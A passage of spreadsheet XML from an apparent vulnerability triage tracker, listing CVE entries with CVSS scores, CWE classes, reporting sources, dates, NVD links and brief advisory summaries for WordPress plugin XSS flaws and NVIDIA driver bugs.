          <t>CVE-2026-97288</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in OAuth Server &lt;= 4.5.1 versions.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97288</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97292</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>Author Cross Site Scripting (XSS) in YITH WooCommerce Tab Manager &lt;= 2.15.0 versions.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97292</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97298</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in King Addons for Elementor &lt;= 51.1.86 versions.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97298</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97301</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in Cool Formkit Lite &lt;= 2.7.8 versions.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97301</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14564</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>The Viable URL Media Uploader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T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14564</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11895</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>The HT Mega Addons for Elementor – Elementor Widgets &amp; Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Data Table 'display_options' Setting in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11895</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14876</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>The Smart Slider 3 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-href' parameter in all versions up to, and including, 3.5.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14876</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47565</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a privileged user could trigger a race condition that leads to an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47565</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47586</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel module where an attacker could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47586</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6170</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'images' parameter of the plugin's bt_bb_css_image_grid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0" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6170</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6171</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'target' parameter of the plugin's bt_bb_icon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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6171</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6172</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' parameter of the plugin's bt_bb_image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2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6172</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6173</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'background_image' parameter of the plugin's bt_bb_section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433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6173</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88037</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `title` attribute of the `bt_bb_service` shortcode in all versions up to, and including, 5.7.2.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434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88037</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92712</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>react, gin</t>
        </is>
      </c>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>The ReactPress – Create React App for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'permalink' parameter in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the permalink parameter is only passed through sanitize_url(), which does not prevent fetching attacker-controlled remote URLs whose response body — including script tags and event-handler attributes — is written verbatim to disk via file_put_contents().</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92712</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93908</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>The Real Estate Manager – Property Listing and Agent Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_price_text' parameter in all versions up to, and including, 7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability is further enabled by the absence of any capability, nonce, or ownership check on the wp_ajax_rem_create_pro_ajax handler, and because the value is persisted via update_post_meta rather than post_content, the wp_kses filtering tied to the unfiltered_html capability does not apply.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93908</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102136</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="S437" s="5" t="inlineStr">
        <is>
